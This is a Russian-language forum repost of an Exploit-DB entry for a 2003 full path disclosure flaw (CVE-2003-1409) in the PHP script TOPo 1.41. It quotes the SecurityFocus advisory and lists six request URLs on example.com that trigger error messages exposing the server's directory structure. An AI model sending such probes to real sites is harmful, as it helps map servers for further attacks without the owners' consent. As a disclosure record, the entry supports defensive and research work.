Exploit TOPO 1.41 - Full Path Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
22222
Проверка EDB
  1. Пройдено
Автор
RYNHO ZEROS WEB
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2003-1409
Дата публикации
2003-02-04
Код:
source: https://www.securityfocus.com/bid/6768/info

It has been reported that TOPo may return information to users that is sensitive in nature. Under some circumstances, it is possible to produce an error message that reveals information about web directory structure. This could result in more organized attack against system resources.

http://www.example.com/[top_path]/in.php?
http://www.example.com/[top_path]/out.php?
http://www.example.com/[top_path]/in.php?id=any_word
http://www.example.com/[top_path]/out.php?id=any_word
http://www.example.com/[top_path]/in.php?any_word
http://www.example.com/[top_path]/out.php?any_word
 
Источник
www.exploit-db.com

Похожие темы